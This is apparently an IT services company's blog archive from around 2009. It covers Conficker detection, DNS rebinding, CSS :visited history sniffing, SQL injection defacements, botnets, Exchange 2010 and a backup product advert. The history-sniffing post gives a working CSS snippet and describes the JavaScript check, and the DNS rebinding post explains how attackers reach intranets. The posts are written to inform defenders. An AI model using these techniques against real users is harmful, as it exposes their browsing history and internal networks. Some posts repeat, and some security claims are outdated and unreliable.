is your computer infected with Conficker?

its a nasty worm and its done some damage… it even took out the Houston courts. so are you infected? It had millions at times and has slowed but you can do a quick spot check to see if you are infected. Look at the four images below… if you can see them it is unlikely that you have been infected. We know this because the virus blocks a few anti-virus websites so attemting to load their logos (or sites if you click) will let you know if you are infected because they are blocked… you may be infected

---

You should see the F-Secure logo here. You can confirm by clicking on the image – if you get through to the F-Secure website, your computer is probably not infected with Conficker.

---

You should see the SecureWorks logo here. You can confirm by clicking on the image – if you navigate to the SecureWorks website, your computer is probably not infected with Conficker.

---

You should see the Trend Micro logo here. You can confirm by clicking on the image – if you get through to the Trend Micro website, your computer is probably not infected with Conficker.

---

F-Prot Antivirus logo should be here. You can confirm by clicking on the image – if you get through to the Frisk Software / F-Prot Antivirus website, your computer is probably not infected with Conficker.

anti DNS pinning (dns rebinding) and your intranet

so me being the crazy guy that i am spent about 15 hours watching defcon videos before i decided to write this and comment on how this attack is still a threat almost a decade after it was fist discovered. basically this is very old but i just found out about it so im sure many others haven’t heard either and i want to bring it to the communities attention (again)

so what is it? how does it work?what are the risks?how can we protect ourselves?

basically with the power of modern browsers you can do almost anything from a webpage. you can create web pages inside web pages (frames) or make http requests from inside a page (xmlhttp) you can even do sockets using everyones favorite plugin (flash) so what does this allow us to do? well create really cool web apps for one but it also allows us to pull off a dns rebinding attack. basically with nothing more than a domain an attacker can read and manipulate local web applications on your intranet most of which allow you to remain logged in,do pass through security from the domain or just don’t have any authentication but that shouldn’t be a problem right? its on an internal server with an internal address and we have a nice firewall. wrong with this attack we gain access to internal web apps (and anything else on the network we care to poke at) by using the victims browser as a proxy. to preform this attack we make the browser believe that the external webpage and the internal one came from the same domain and effectively bypass the cross domain policy that is meant to prevent this attack from occurring. so lets look at what happens

a user requests foo.com and gets back a external address (and a webpage) this page then waits for or triggers the dns resolution of foo.com again but this time our attacker tells the dns to return an internal ip. the external page came from foo.com but the browser also thinks the internal page did too and therein lies the problem. now the attackers page can talk to the internal page and do whatever it likes such as

load flash and do a port scan from inside the network (working demo)

or reset your home router

or something else nasty because basically now we have a vpn connection into the network and all without a user click or an exploit to the os or any interaction at all. we simply sent you to our webpage or you loaded the javascript from our ad and now we are in. this attack has been going on forever and it really has no patch, its an issue with one of the root ideas of the internet dns. we need to take a closer look at the infrastructure that runs the internet and how we can secure ourselves and our clients from such devastatingly simple attacks

or something else nasty because basically now we have a vpn connection into the network and all without a user click or an exploit to the os or any interaction at all. we simply sent you to our webpage or you loaded the javascript from out ad and now we are in. this attack has been going on forever and it really has no patch, its an issue with one of the root ideas of the internet dns. we need to take a closer look at the infrastructure that runs the internet and how we can secure ourselves and our customers from such devastatingly simple attacks

i know i kinda glazed over some of the more technical aspects but i think i got the overall point across and im sure google could help you out if you wanted to know more.  Im also sure that you have comments / ways to mitigate this (or make it really really hard) and i would like to hear those in this posts comments im just starting to be able to understand some of these more advanced security issues and i think that we should be aware of them even if we haven’t come up with a solid solution just yet

here are some more reasources for reading:

http://christ1an.blogspot.com/2007/07/dns-pinning-explained.html

http://ha.ckers.org/blog/20060908/dns-pinning-just-got-worse/

https://www.blackhat.com/presentations/bh-usa-07/Byrne/Presentation/bh-usa-07-byrne.pdf

thank you for your time

carter cole

never send a human to do a computers job

Start Panic! and how it works

OK so what is Start Panic!

Basically all it does is enumerate your browsing history… but that’s a lot. Everything we do now is online and all those sites we use to do everything from our banking to our social networking. First I want to quickly cover why this information should be kept secret and then explain exactly how they are getting to it.

First this on its own is hardly a problem aside from some embarrassing browsing history there isn’t a lot you can do with the history you steal but combined with the classics (social engineering, weak passwords and phishing) you could be in a lot of trouble. It happened to twitter just recently and it can happen to you, people can guess security questions based on your social networking sites responses “where did you first go to school” or “what’s your pet’s name” are no longer hard to find and you browsing history will tell them exactly where they can find you profiles. With some basic info on you and a crafty email many would fall for a phishing scam and from there they can get even more. 61% of passwords are reused for all sites (1) and that means if one of your online profiles is lost they all are in danger especially if it’s your webmail account. They can just have the sites reset your passwords for them. Yahoo has taken one of the first measures against this by having multiple security questions and the ability to reset your password with your cell but many sites still don’t offer this service.

But enough with the scare tactics let’s look at exactly how this attack is conducted and how some simple functionality gave the attacker the keys to the kingdom.

CSS is the new way to style text on the web and it’s responsible for much of the explosion in design creativity but it can also leak important info (such as your browsing history)

Consider this css:

<style>

a{

display:none;

}

a:visited {

display:block;

}

</style>

Now any links will only display if they have been visited. They write a large number of links to the page from common sites like facebook, or your bank and it’s a simple task to make some JavaScript to check which links on the page are displayed. It’s done they have your browsing history (and know what sites you use and where you bank online)

There is now way to prevent this attack, it is still possible to perform this attack with no javascript but it is uncommon and unreliable. So watch out and clear your history because you don’t know who’s reading your history as you pass by

1) http://www.readwriteweb.com/archives/majority_use_same_password.php

Basically all it does is enumerate your browsing history… but that’s a lot. Everything we do now is online and all those sites we use to do everything from our banking to our social networking. First I want to quickly cover why this information should be kept secret and then explain exactly how they are getting to it.

First this on its own is hardly a problem aside from some embarrassing browsing history there isn’t a lot you can do with the history you steal but combined with the classics (social engineering, weak passwords and phishing) you could be in a lot of trouble. It happened to twitter just recently and it can happen to you, people can guess security questions based on your social networking sites responses “where did you first go to school” or “what’s your pet’s name” are no longer hard to find and you browsing history will tell them exactly where they can find you profiles. With some basic info on you and a crafty email many would fall for a phishing scam and from there they can get even more. 61% of passwords are reused for all sites (1) and that means if one of your online profiles is lost they all are in danger especially if it’s your webmail account. They can just have the sites reset your passwords for them. Yahoo has taken one of the first measures against this by having multiple security questions and the ability to reset your password with your cell but many sites still don’t offer this service.

But enough with the scare tactics let’s look at exactly how this attack is conducted and how some simple functionality gave the attacker the keys to the kingdom.

CSS is the new way to style text on the web and it’s responsible for much of the explosion in design creativity but it can also leak important info (such as your browsing history)

Consider this css:

<style>

a{

display:none;

}

a:visited {

display:block;

}

</style>

Now any links will only display if they have been visited. They write a large number of links to the page from common sites like facebook, or your bank and it’s a simple task to make some JavaScript to check which links on the page are displayed. It’s done they have your browsing history (and know what sites you use and where you bank online)

There is no way to prevent this attack, it is still possible to perform this attack with no JavaScript (it involves using a server side script and requests to the server for images) but it is uncommon and unreliable. So watch out and clear your history because you don’t know who’s reading your history as you pass by on the world wide web

1) http://www.readwriteweb.com/archives/majority_use_same_password.php

New search technology (a Google Lovefest)

Google is the big dog of the internet world and I wanted to give a quick update on some of the new technology they have been adding to their searches over the past few months. Color search in images, more options for our searches and better ways to get our content indexed Google defiantly has the end user in mind and is providing great tools to make our searches easier and lives better

The first new thing I want to talk mention is Google’s new ability to search for images with only a certain color. Now as an option in image search you can choose what colors you want your results to mostly contain. I have a few ideas for using it to generate very complete image libraries for image mosaic programs such as AndreaMosaic (FREE)( http://www.andreaplanet.com/andreamosaic/) but its mostly just a lot of fun to play with. You can read more here http://googleblog.blogspot.com/2009/04/search-rainbow.html

Now more recently Google has done it again adding even more options to their search queries. The ability to search for only forums, find reviews and look at only recent results is now available within their search options tab. Find out more at http://www.dullest.com/blog/google-searchology-2009-search-options-google-squared-rich-snippets/

And to finish this Google lovefest off I would like to talk about a couple things they have implemented to help the ever important web developers keep your site indexed correctly and showing relevant data that helps drive traffic to your business. First is the canonical url which helps improve indexing and searches by providing a way to identify duplicate pages in your site. With everything dynamic nowadays with web 2.0 in full swing a lot of pages may have very different look and feel depending on where you came from. Before there duplicate pages would add trash to the index but now there is an easy way to specify one page is like another… The canonical url. Now all your precious link juice and other info on the page Google finds can be connected and won’t be wasted spread across many different permutations of a page.

Read more about the canonical url here http://googlewebmastercentral.blogspot.com/2009/02/specify-your-canonical.html

Finally the newest of the new is the idea of inline xml to describe many different common objects so they can be easily parsed and searched. “Rich Snippets” allow for developers to embed information about the text on the page and specify a parseable format for reviews, people or companies. This extra meta data will allow Google to show even more relevant information about your pages and further help drive traffic to your site. Get the latest on micro formats from Google themselves but also at http://searchengineland.com/google-search-now-supports-microformats-and-adds-rich-snippets-to-search-results-19055

SQL injection attacks, Website Defacements and How to protect your ASP

Website defacements are never good they look bad on the website and the developer but how do they do it? Although SQL injection can have much worse ramifications than a defacement let’s look at how a simple defacement could occur and how we can protect our applications from this form of attack.

Defacements are often carried out by hacker’s bots looking for vulnerabilities in scripts performing an automated attack on sites that meet some initial criteria. When a bot finds a page that could be venerable to a SQL injection attack it tries sending a request with every possible user input filled with a specially crafted SQL statement to try and infect the websites database with their malicious JavaScript.

The following url contains a real SQL injection query that had been encoded in hex so special characters could be used in the query string. It does one thing terminate the current query and attempt to deface the website.

The real world SQL injection query was found on
http://www.diegolewis.com/blog/?p=26

This little query (from above url) appends a HTML script tag to deface websites to every row in every column in every table that could hold text that could be written to a sites page. The result is the database becomes filled with the malicious JavaScript tag and eventually it gets written to a page.

The malicious JavaScript can do anything but often draws a layer over the original website with a message claiming credit for the defacement. Once a website has been defaced it is often submitted to http://www.zone-h.org/ a popular website for tracking defacements. A small hole in your code has brought your site down temporally and killed your reputation with any customers that may have visited during the attack

So how can we protect our websites from this type of attack? By sanitizing all user input and implementing parameterized queries in our applications. The basic idea is to look for any SQL in the user input and stop it before it is executed. Here are some other people that have tackled this subject and come up with some useful information.

Nazim’s IIS Security Blog – Filtering SQL injection from Classic ASP

http://blogs.iis.net/nazim/archive/2008/04/28/filtering-sql-injection-from-classic-asp.aspx

The 4 Guys Article on SQL injection

http://www.4guysfromrolla.com/webtech/061902-1.shtml

Microsoft’s pointers on protecting yourself from a SQL attack

http://msdn.microsoft.com/en-us/library/ms998271.aspx

Data Backup Nightmares

Data Backup Nightmares Who has had problems with reliably backing up our data on our computer networks? All business have had this problem and you usually do not find out about these issues until it is too late. In other words, you lost that data or it has become corrupt. Also, the pain of managing a backup is an issue too. Changing tapes or hard drives on a daily basis is something so easily forgot, and they seldom go offsite like they need too. IS Support has developed a product called IS RapidRestore. The product has the following features:

• Backups of data every 15 minutes and can store these backups up to year

 • Offsite backup of the full data every night

• Virtual capabilities that can restore business operations in less than 1 hour

• Monitored 24/7 by a professional and knowledge staff.

RapidRestore replaces all of your backup setups used today. No more need to upgrade to the latest backup software. No more need to manage a tape rotation and offsite process. This product gives you great piece of mind that your data is backed up and restorable very easy. For more information, check out this link: www.issupport.com/ISRR.asp To get more information, please contact sales@issupport.com or call 713-861-7870.

A worm to the botnet?

Over the past few weeks, we’ve been hearing about worms, botnets and worldwide virus outbreaks (the computer kind, not Pig Flu). What exactly does a worm or botnet do? How can we be protected from these infections? Can these ever be competely stopped? Will my computer ever get a virus?

A virus is basically any piece of software written to spread across multiple computers, mostly without any user interaction, and sometimes can damage or steal user data. Computer virii are usually broken down as: worms – spreads across computers using security holes; trojans – a virus that looks like an innocent piece of software to the user; rootkits – programs that hide themselves to prevent detection and usually spread other virii. I personally consider spyware and adware to be viruses since they interfere with a persons computing experience and serve no purpose other than to trick people in to buying or clicking something.

Sometimes, the virus itself isn’t the issue; the virus is only a vehicle to deliver another piece of software. These secondary infections might be other virii, spyware/adware, or botnet clients. The botnet client is an interesting tool and can be used for good, but unfortunately is usually used for evil. This piece of software can allow many computers (millions) to be controlled from multiple places in the world and cause them to do whatever the botnet creator wants. Popularly, these botnets are used to send SPAM emails and attack specific websites.  Imagine if you had 400,000 computers around the world sending 10,000 SPAM messages EACH per day! This is one reason why SPAM is difficult to nail down. Now imagine you have those same computers all requesting pages from the same website, at the same time, at a rate of 10 requests per second. This would bring any website to a crawl and even appear to be completely offline! And the best part is: you might never know you’re infected and with the use of rootkits, your virus scanner might not ever find it!

So now that you’re completely freaked out and about to pull the power cable from your computer, let me explain what can be done. Like any biological organism with an immune system, the best way to fight infection is to prevent it from entering your computer. This means frequent updates to your operating system and other applications. All major operating systems (Windows, MacOS, Linux) and many software writers (Sun, Adobe, Google, Mozilla) have a mechanism to notify and/or mass deploy security and usability updates. Use it! Whenever it reports a security patch is available, you should install this as soon as you make a backup of your system (updates fail and can cause serious heartache). The second step is antimalware software. This is the immune system of your computer. If something breaks through or takes adavantage of an unpatched system, the antivirus might be able to catch the infection before it spreads too far. However, antimalware applications must be updated at least daily, if not three times a day; virus writers are driven by ego, money and boredom, so they can crank out new infections rather quickly. Third, make sure your computer is behind a firewall. This device prevents direct attacks and hides your computer from infected computers scanning for their next host. Lastly, do not open emails that look suspect or click on ads that popup.  All mainstream web browsers have a popup blocker built in, but that doesn’t stop them all. Sometimes just clicking an ad will install something in the background and cause more popups or other infections.

Chances are, you’ve had a virus and you’ll get another. This is part of our online world. Keep everything updated, schedule regular virus scans and pay attention to what you click. Infections will probably never go away. As long as there is any system in place, there will be those that want to hack it and see what they can get away with; most of the time, for the sheer joy of doing it. All we can do is hope for the best, prepare for the worst and expect the unexpected.

Now go get patched!

G’night!

Steve Domingo

IS Support, Inc.

sdomingo <at> issupport.com

www.issupport.com

 

Additional reading but not endorsements

Conficker begins to awaken: http://bit.ly/uxhMD

MacOS botnet: http://bit.ly/aMBKy

Malwarebytes.org

Windows Defender

Eset NOD32

ClamAV

 

 

Exchange 2010

WOW!  The beta of Exchange Server 2010 is already here.  It seems like 2007 just hit the market, and now we are already hearing about the next version.   We have just started implementing 2007 in the last 9 months and most of our consultants are familiar with it now.  We are finding it to be a far better product than Exchange 2003. 

The problem that I have with this release is that IS Support has found that only a minority of our clients have an interest in upgrading to this 2007.  My current opinion is that most clients will not upgrade to 2007, and rather skip directly to 2010 especially with the current economic situation. 

It will be interesting to watch how our clients handle Exchange 2007 and 2010 which is one year away or there about from release. 

Please let me know your thoughts.

 

Steve Combs

713-861-7870

Scombs<at>issupport.com

www.issupport.com

Internet worms and Cybercriminals

Today on the front page of USAToday, there is an ariticle titled Cracking the Code.   This article discusses the use of cheap labor to enter captcha’s to create fake facebook and other social networking accounts.  What the heck is a captcha?   They are the distorted letters and characters that you must enter when you are creating an account on a social networking site and other websites.  Here is the article:

http://www.usatoday.com/tech/news/computersecurity/2009-04-22-captcha-code-breakers_N.htm

The whole goal of these cybercriminals is to start spamming within the social networking sites just like email.  The concern is that social networking will go the way of email.  90% of email today is spam. 

Steve Combs

scomb<at>issupport.com

www.issupport.com

IS Support, Inc

IS Support is a IT solution provider in Texas.   This blog was created to provide the general small business community in Texas a tool to keep track of the numerous changes that are occuring on a daily, weekly and monthly basis.  The posts will focus on the latest technology news that will affect small and medium sized businesses.  Please watch this site for weekly updates going forward. 

Please subscribe to get email updates when a new posting comes out.

Steve Combs

IS Support, Inc

www.issupport.com

scombs<at>issupport.com